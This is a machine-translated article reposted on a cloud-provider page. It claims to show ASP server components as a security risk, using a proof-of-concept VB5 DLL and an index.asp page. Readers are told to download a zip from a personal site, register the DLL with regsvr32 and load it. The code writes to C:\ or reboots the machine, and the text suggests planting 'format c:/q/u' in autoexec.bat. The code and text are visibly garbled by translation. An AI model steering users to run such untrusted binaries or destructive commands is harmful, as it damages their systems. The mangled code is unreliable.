Security problems in ASP main parts

Source: Internet
Author: User
Tags chr error code file copy
Security | issues


Microsoft introduced ASP to simple, easy to use, multi-function, scalability and other powerful features of netizens and most of the favor of network management, a complete replacement for the trend of CGI, but there are some problems here, if using ASP, your network security also greatly reduced! For an example, follow the steps below:

1, download this file Http://home.gbsource.net/xuankong/dll.zip, decompression after the Test.dll file copy to C:\Windows\System (if you are using NT, Please copy to the corresponding directory);

2, Next Open "Start/Run" menu to enter "Regsvr32test.dll" command;

3, copy uncompressed package of the index.asp to your server directory (if you are using PWS debugging can be copied to the "C:\inetpub\wwwroot", NT please copy to the corresponding directory);

4, change a machine with IE browse index.asp file to see (you see is the error code, but in fact, the program has been running), you return to your machine to see if the c:\ below is not a more than a file? A file named Xuankong.dat (in fact, if I want to, your C:\autoexec.bat file page can be I open and write some like "format c:/q/u" and other commands, then when you restart the next time, hey. )。

Let's take a look at what's going on, the DLL files you just copied are actually one of the main pieces I developed using Visul Basic5:
1, open VB5 new "ActiveX.dll" file, bar The following code input:
Private Declare Function exitwindowsex Lib "User32" _
(ByVal uflags as Long,byval dwreserved as Long) _
As Long
Sub Xuankong () "Please don't add private."
A$=inputbox ("Please enter your name if you entered" Xuankong "" +CHR "+CHR (10) +
"You will generate a" Xuankong "file in your system +CHR +CHR (13) +
"Otherwise your machine may be reset", "Please input", "Xuankong")
If a$= "Xuankong" Then
Open "C:\xuankong.dat" for Append as #Write #, "My friend, this is an ASP Master test program"
#Write #, "Hello World!this is a test"
#Write, "If you see this file test will succeed!" "
Else
exitwindowsex&h43,0 use API function to reboot machine
End If
Close #1
End Sub
2, change the project name to a DLL, change the class module to test, and then generate the DLL file into the C:\Windows\System directory below the project.
3, create a new index.asp file to enter in the following code:
$#@60;html$#@62;$#@60;head$#@62;$#@60;title$#@62; This is a test $#@60;/title$#@62;$#@60;/head$#@62 about ASP main parts;
$#@60;body$#@62;
$#@60;% set Rs=server.createobject ("Dll.test")%$#@62;
$#@60;% set Rs1=rs.xuankong Rs1.execute%$#@62;
$#@60;/body$#@62;
$#@60;/html$#@62;
4, copy index.asp to your server, and follow the above method to debug!

The above is the ASP main part of the security issue! In addition, if some authors write ASP main pieces of the time inadvertently leave the system bug! That's even more difficult to find!




Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.